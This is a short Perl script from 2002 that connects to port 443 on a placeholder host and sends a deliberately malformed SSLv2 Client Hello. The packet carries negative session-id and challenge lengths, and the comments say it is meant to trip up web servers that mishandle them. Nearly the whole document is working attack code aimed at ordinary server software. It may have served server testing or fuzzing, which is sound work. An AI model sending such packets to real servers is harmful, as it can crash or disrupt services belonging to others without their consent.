#!/usr/bin/perl -w
#
# Write a malformed SSL packet to the network.
# Some web servers have been known to trip over
# bad session id length (negative, or shorter than
# the actual amount of data supplied).
#
# A tool like ethereal (http://www.ethereal.org/) is
# invaluable for parsing SSL packets on the wire,
# and modifying the contents.
#
# Jon Thackray, Feb 2002
#

use Socket;

my $host = "secure.somecompany.com";
my $port = 443;
my $proto = getprotobyname( 'tcp' );
my $host_iaddr = inet_aton( $host );

die( "Couldn't resolve host name: $host\n" ) if ( !defined( $host_iaddr ));

my $host_paddr = sockaddr_in( $port, $host_iaddr );

socket( SOCKET, PF_INET, SOCK_STREAM, $proto )
   or die( "Socket: $!\n" );

connect( SOCKET, $host_paddr )
   or die( "Connect: $!\n" );

$nasty_ssl_packet = pack( "C*",
        0x80, 0x0a,   # SSLv2 length 10
        0x01,         # Client Hello (type 0x1)
        0x03, 0x00,   # Version number
        0x00, 0x10,   # Cipher spec length (16 bytes)
        0xff, 0xfd,   # Session id length (negative)
        0xff, 0xe9,   # Challength length (negative)
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 # Cipher spec and challenge data
    );

syswrite( SOCKET, $nasty_ssl_packet );
close( SOCKET );